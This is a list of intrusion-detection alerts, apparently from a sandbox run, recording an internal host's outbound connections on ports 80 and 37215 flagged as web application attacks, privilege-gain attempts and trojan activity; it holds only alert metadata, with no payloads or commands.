              Timestamp:192.168.2.23190.77.152.21653296802030092 01/02/24-06:25:16.037354
              SID:2030092
              Source Port:53296
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.182.153.6248988802030092 01/02/24-06:24:24.372962
              SID:2030092
              Source Port:48988
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.24.144.16546790802025883 01/02/24-06:25:42.725214
              SID:2025883
              Source Port:46790
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.235.63.152.5938096802030092 01/02/24-06:24:37.257342
              SID:2030092
              Source Port:38096
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23122.219.208.9451858802030092 01/02/24-06:25:29.715016
              SID:2030092
              Source Port:51858
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.51.136.5541670802030092 01/02/24-06:25:42.872171
              SID:2030092
              Source Port:41670
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23216.137.174.13447390802030092 01/02/24-06:25:22.016894
              SID:2030092
              Source Port:47390
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.161.154.7646938802025883 01/02/24-06:24:40.755405
              SID:2025883
              Source Port:46938
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23138.118.173.13258566802025883 01/02/24-06:24:33.144309
              SID:2025883
              Source Port:58566
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.235.133.222.13648094802025883 01/02/24-06:23:51.610663
              SID:2025883
              Source Port:48094
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.29.100.3746672802025883 01/02/24-06:24:49.045138
              SID:2025883
              Source Port:46672
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23168.93.163.14643476802025883 01/02/24-06:24:30.901528
              SID:2025883
              Source Port:43476
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.103.5538508372152835222 01/02/24-06:24:27.790071
              SID:2835222
              Source Port:38508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23220.134.75.18260554802025883 01/02/24-06:25:32.202180
              SID:2025883
              Source Port:60554
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.223.106.9147644802030092 01/02/24-06:24:04.156293
              SID:2030092
              Source Port:47644
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23193.233.164.23748736802025883 01/02/24-06:24:17.936241
              SID:2025883
              Source Port:48736
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.249.21.23144962802030092 01/02/24-06:23:59.225841
              SID:2030092
              Source Port:44962
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.216.42.2137628802025883 01/02/24-06:25:15.620032
              SID:2025883
              Source Port:37628
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.3.57.12446500802030092 01/02/24-06:25:22.066559
              SID:2030092
              Source Port:46500
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.167.130.6444126802030092 01/02/24-06:24:24.131709
              SID:2030092
              Source Port:44126
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.217.213.3240972802030092 01/02/24-06:25:14.761574
              SID:2030092
              Source Port:40972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23106.14.41.17435930802025883 01/02/24-06:24:18.753229
              SID:2025883
              Source Port:35930
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2354.219.136.3735172802030092 01/02/24-06:25:18.698984
              SID:2030092
              Source Port:35172
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.121.20.14551014802025883 01/02/24-06:24:24.984846
              SID:2025883
              Source Port:51014
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.231.150.12851852802030092 01/02/24-06:24:24.125011
              SID:2030092
              Source Port:51852
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23217.23.144.15954616802025883 01/02/24-06:25:02.033209
              SID:2025883
              Source Port:54616
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23143.208.250.1143668802030092 01/02/24-06:25:10.207227
              SID:2030092
              Source Port:43668
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.236.88.18038176802030092 01/02/24-06:25:14.749773
              SID:2030092
              Source Port:38176
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2387.123.31.16541088802030092 01/02/24-06:24:24.186617
              SID:2030092
              Source Port:41088
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.205.246.4848598802025883 01/02/24-06:24:55.255106
              SID:2025883
              Source Port:48598
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.61.119.7736382802030092 01/02/24-06:23:51.529010
              SID:2030092
              Source Port:36382
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23201.229.167.15941366802025883 01/02/24-06:24:19.178132
              SID:2025883
              Source Port:41366
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.242.215.20436660802025883 01/02/24-06:24:18.756077
              SID:2025883
              Source Port:36660
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.224.189.17652658802025883 01/02/24-06:25:00.915017
              SID:2025883
              Source Port:52658
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2349.233.248.20255454802025883 01/02/24-06:25:29.740902
              SID:2025883
              Source Port:55454
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.91.11.15157840802030092 01/02/24-06:23:57.977771
              SID:2030092
              Source Port:57840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.138.75.22955822802030092 01/02/24-06:25:35.265496
              SID:2030092
              Source Port:55822
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.2.14.1251600802030092 01/02/24-06:24:35.360260
              SID:2030092
              Source Port:51600
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.107.164.6038972802025883 01/02/24-06:24:27.400912
              SID:2025883
              Source Port:38972
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2380.15.65.10050756802025883 01/02/24-06:24:55.923121
              SID:2025883
              Source Port:50756
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23195.62.126.5460000802025883 01/02/24-06:24:11.155988
              SID:2025883
              Source Port:60000
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.70.223.6440344802030092 01/02/24-06:24:31.051081
              SID:2030092
              Source Port:40344
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2341.0.84.3441028372152829579 01/02/24-06:24:06.080918
              SID:2829579
              Source Port:41028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2318.214.78.16148682802025883 01/02/24-06:24:56.009741
              SID:2025883
              Source Port:48682
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23218.35.171.23047210802030092 01/02/24-06:24:23.810086
              SID:2030092
              Source Port:47210
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.160.3.14954360802030092 01/02/24-06:24:40.650599
              SID:2030092
              Source Port:54360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.32.70.4540790802025883 01/02/24-06:24:45.911026
              SID:2025883
              Source Port:40790
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2324.236.125.8436362802030092 01/02/24-06:23:50.012962
              SID:2030092
              Source Port:36362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.211.213.10757532802025883 01/02/24-06:25:37.947175
              SID:2025883
              Source Port:57532
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2374.217.134.1157808802025883 01/02/24-06:25:44.030944
              SID:2025883
              Source Port:57808
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.250.65.9258572802030092 01/02/24-06:25:21.541317
              SID:2030092
              Source Port:58572
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.254.208.1058096802030092 01/02/24-06:24:13.764312
              SID:2030092
              Source Port:58096
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.222.57.8340002802025883 01/02/24-06:24:17.613377
              SID:2025883
              Source Port:40002
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.44.248.10442602802030092 01/02/24-06:24:27.798165
              SID:2030092
              Source Port:42602
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2347.90.200.13459390802030092 01/02/24-06:24:08.717627
              SID:2030092
              Source Port:59390
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23170.130.22.25444286802025883 01/02/24-06:24:08.505355
              SID:2025883
              Source Port:44286
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23106.15.76.4851782802025883 01/02/24-06:24:31.040036
              SID:2025883
              Source Port:51782
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.67.255.7133036802030092 01/02/24-06:24:42.963614
              SID:2030092
              Source Port:33036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.241.14.15348512372152829579 01/02/24-06:23:49.692230
              SID:2829579
              Source Port:48512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2350.228.64.4932936802030092 01/02/24-06:25:04.956264
              SID:2030092
              Source Port:32936
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23130.211.15.9540968802030092 01/02/24-06:23:49.492483
              SID:2030092
              Source Port:40968
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.135.71.17637678802030092 01/02/24-06:24:11.112670
              SID:2030092
              Source Port:37678
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.188.170.14760094802030092 01/02/24-06:24:56.015920
              SID:2030092
              Source Port:60094
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.85.133.3147266802030092 01/02/24-06:24:51.888604
              SID:2030092
              Source Port:47266
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.218.175.19054758802030092 01/02/24-06:25:06.948021
              SID:2030092
              Source Port:54758
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2384.247.28.15551342802025883 01/02/24-06:24:08.653606
              SID:2025883
              Source Port:51342
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2362.210.48.11336542802025883 01/02/24-06:25:31.316043
              SID:2025883
              Source Port:36542
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.216.114.4945924802025883 01/02/24-06:25:10.067215
              SID:2025883
              Source Port:45924
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2368.68.1.22036644802025883 01/02/24-06:25:00.920491
              SID:2025883
              Source Port:36644
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.169.136.260250802030092 01/02/24-06:24:37.969433
              SID:2030092
              Source Port:60250
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.225.210.1847296802025883 01/02/24-06:24:55.316812
              SID:2025883
              Source Port:47296
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.114.245.25152468802030092 01/02/24-06:25:19.107884
              SID:2030092
              Source Port:52468
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.136.180.9132958802025883 01/02/24-06:24:20.174770
              SID:2025883
              Source Port:32958
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23208.70.77.18137854802025883 01/02/24-06:24:43.121132
              SID:2025883
              Source Port:37854
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.102.23034064372152829579 01/02/24-06:23:48.382924
              SID:2829579
              Source Port:34064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2377.74.207.20352380802025883 01/02/24-06:25:35.073405
              SID:2025883
              Source Port:52380
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.114.164.4947672802030092 01/02/24-06:25:25.169174
              SID:2030092
              Source Port:47672
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.26.81.356728802030092 01/02/24-06:24:49.038851
              SID:2030092
              Source Port:56728
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.202.156.24135188802030092 01/02/24-06:24:17.662475
              SID:2030092
              Source Port:35188
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23121.4.183.14448996802025883 01/02/24-06:25:19.173099
              SID:2025883
              Source Port:48996
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.35.155.16647130802025883 01/02/24-06:25:42.678669
              SID:2025883
              Source Port:47130
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2382.165.119.13360268802030092 01/02/24-06:24:19.252681
              SID:2030092
              Source Port:60268
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.37.135.6550062802030092 01/02/24-06:24:03.045010
              SID:2030092
              Source Port:50062
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23181.206.2.4650076802030092 01/02/24-06:24:03.265616
              SID:2030092
              Source Port:50076
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2344.215.139.22838962802030092 01/02/24-06:25:42.024128
              SID:2030092
              Source Port:38962
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23175.126.123.11658590802025883 01/02/24-06:25:04.257669
              SID:2025883
              Source Port:58590
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2354.179.83.5233844802030092 01/02/24-06:25:04.468216
              SID:2030092
              Source Port:33844
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.24.96.4456028802030092 01/02/24-06:25:04.184391
              SID:2030092
              Source Port:56028
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23142.93.144.23436246802030092 01/02/24-06:24:36.837939
              SID:2030092
              Source Port:36246
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.75.225.9144926802030092 01/02/24-06:24:58.708367
              SID:2030092
              Source Port:44926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.71.40.21548486802030092 01/02/24-06:24:05.866440
              SID:2030092
              Source Port:48486
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.231.34.9059060802025883 01/02/24-06:24:27.279281
              SID:2025883
              Source Port:59060
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23109.168.109.22945120802025883 01/02/24-06:23:56.151964
              SID:2025883
              Source Port:45120
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.98.939512372152829579 01/02/24-06:24:15.985357
              SID:2829579
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2313.244.84.14656714802030092 01/02/24-06:24:09.228401
              SID:2030092
              Source Port:56714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.141.149.9046528802025883 01/02/24-06:24:19.516603
              SID:2025883
              Source Port:46528
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23174.71.165.22954816802030092 01/02/24-06:24:51.730581
              SID:2030092
              Source Port:54816
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23210.136.185.6435820802025883 01/02/24-06:25:42.761377
              SID:2025883
              Source Port:35820
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23207.60.214.5343892802030092 01/02/24-06:23:58.146252
              SID:2030092
              Source Port:43892
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2327.54.141.22460562802030092 01/02/24-06:24:30.783293
              SID:2030092
              Source Port:60562
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.75.5454612372152835222 01/02/24-06:25:31.710967
              SID:2835222
              Source Port:54612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23185.204.186.16245770802030092 01/02/24-06:24:24.014425
              SID:2030092
              Source Port:45770
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2381.45.23.21550156802025883 01/02/24-06:25:39.133513
              SID:2025883
              Source Port:50156
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.91.92.17553294802025883 01/02/24-06:25:42.747930
              SID:2025883
              Source Port:53294
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.208.51.24237438802025883 01/02/24-06:24:46.160935
              SID:2025883
              Source Port:37438
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.90.166.540292802025883 01/02/24-06:25:26.148693
              SID:2025883
              Source Port:40292
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2347.96.31.6043368802025883 01/02/24-06:24:32.931561
              SID:2025883
              Source Port:43368
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.189.137.1749444802030092 01/02/24-06:25:04.484177
              SID:2030092
              Source Port:49444
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.218.57.12838636802025883 01/02/24-06:23:50.310617
              SID:2025883
              Source Port:38636
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.43.100.11357888802025883 01/02/24-06:24:43.056570
              SID:2025883
              Source Port:57888
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.75.103.11733286802030092 01/02/24-06:24:31.278952
              SID:2030092
              Source Port:33286
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.209.26.22960854802025883 01/02/24-06:24:32.802584
              SID:2025883
              Source Port:60854
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.24.209.20437990802030092 01/02/24-06:25:29.545650
              SID:2030092
              Source Port:37990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.97.157.9157446802030092 01/02/24-06:25:34.999588
              SID:2030092
              Source Port:57446
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.52.177.10058232802030092 01/02/24-06:24:00.958032
              SID:2030092
              Source Port:58232
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2341.111.241.3452770802025883 01/02/24-06:25:30.188511
              SID:2025883
              Source Port:52770
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.37.215.11352664802030092 01/02/24-06:25:06.760411
              SID:2030092
              Source Port:52664
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.223.119.15053212802030092 01/02/24-06:25:25.284668
              SID:2030092
              Source Port:53212
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23202.88.191.10458160802025883 01/02/24-06:23:59.400873
              SID:2025883
              Source Port:58160
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.217.78.18433170802025883 01/02/24-06:25:04.964747
              SID:2025883
              Source Port:33170
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23192.126.242.16243294802025883 01/02/24-06:25:09.578837
              SID:2025883
              Source Port:43294
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.15.66.2040310802025883 01/02/24-06:24:05.830727
              SID:2025883
              Source Port:40310
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.73.17.2758458802030092 01/02/24-06:24:01.120240
              SID:2030092
              Source Port:58458
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.79.255.2941640802030092 01/02/24-06:24:05.776321
              SID:2030092
              Source Port:41640
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.218.179.4559110802030092 01/02/24-06:25:34.705547
              SID:2030092
              Source Port:59110
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2367.160.112.10851240802025883 01/02/24-06:25:15.888424
              SID:2025883
              Source Port:51240
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23149.57.79.10232814802030092 01/02/24-06:23:51.958904
              SID:2030092
              Source Port:32814
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.79.154.21054452802025883 01/02/24-06:24:58.941620
              SID:2025883
              Source Port:54452
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.140.253.6745590802025883 01/02/24-06:25:35.354970
              SID:2025883
              Source Port:45590
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23109.109.200.17557970802030092 01/02/24-06:24:01.322259
              SID:2030092
              Source Port:57970
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.210.249.6660948802025883 01/02/24-06:24:52.075605
              SID:2025883
              Source Port:60948
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2375.187.170.24035348802025883 01/02/24-06:24:30.620216
              SID:2025883
              Source Port:35348
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23216.172.159.3643926802030092 01/02/24-06:25:37.943407
              SID:2030092
              Source Port:43926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23107.149.236.15149944802025883 01/02/24-06:24:54.829093
              SID:2025883
              Source Port:49944
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.55.173.24453040802030092 01/02/24-06:23:51.512013
              SID:2030092
              Source Port:53040
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2388.151.101.14851274802025883 01/02/24-06:25:35.254797
              SID:2025883
              Source Port:51274
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23193.46.47.24236186802025883 01/02/24-06:25:30.204860
              SID:2025883
              Source Port:36186
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23191.96.205.19456586802025883 01/02/24-06:24:13.903880
              SID:2025883
              Source Port:56586
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2342.237.113.22243184802025883 01/02/24-06:24:52.311736
              SID:2025883
              Source Port:43184
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2337.32.125.6150126802030092 01/02/24-06:24:18.097501
              SID:2030092
              Source Port:50126
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.26.86.8560062802025883 01/02/24-06:25:19.114868
              SID:2025883
              Source Port:60062
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2361.221.104.22858714802030092 01/02/24-06:25:43.149492
              SID:2030092
              Source Port:58714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.25.137.9540366802025883 01/02/24-06:24:34.920245
              SID:2025883
              Source Port:40366
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.57.244.12937714802025883 01/02/24-06:25:07.005656
              SID:2025883
              Source Port:37714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23213.29.227.25034468802025883 01/02/24-06:24:19.265733
              SID:2025883
              Source Port:34468
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2385.126.165.10351920802025883 01/02/24-06:25:29.714738
              SID:2025883
              Source Port:51920
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23201.192.158.13039898802025883 01/02/24-06:25:34.727412
              SID:2025883
              Source Port:39898
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.245.174.8046628802030092 01/02/24-06:24:17.912872
              SID:2030092
              Source Port:46628
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.230.152.22549862802030092 01/02/24-06:24:23.652013
              SID:2030092
              Source Port:49862
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23220.137.212.6059920802025883 01/02/24-06:25:15.748234
              SID:2025883
              Source Port:59920
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2390.79.11.6051570802025883 01/02/24-06:25:21.019509
              SID:2025883
              Source Port:51570
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.67.240.21640034802030092 01/02/24-06:25:29.545694
              SID:2030092
              Source Port:40034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23118.99.59.24958056802025883 01/02/24-06:24:31.063069
              SID:2025883
              Source Port:58056
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23170.130.122.6435776802030092 01/02/24-06:25:42.642200
              SID:2030092
              Source Port:35776
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23148.72.211.16752086802030092 01/02/24-06:24:45.420651
              SID:2030092
              Source Port:52086
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.1.227.24732976802025883 01/02/24-06:25:31.234449
              SID:2025883
              Source Port:32976
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
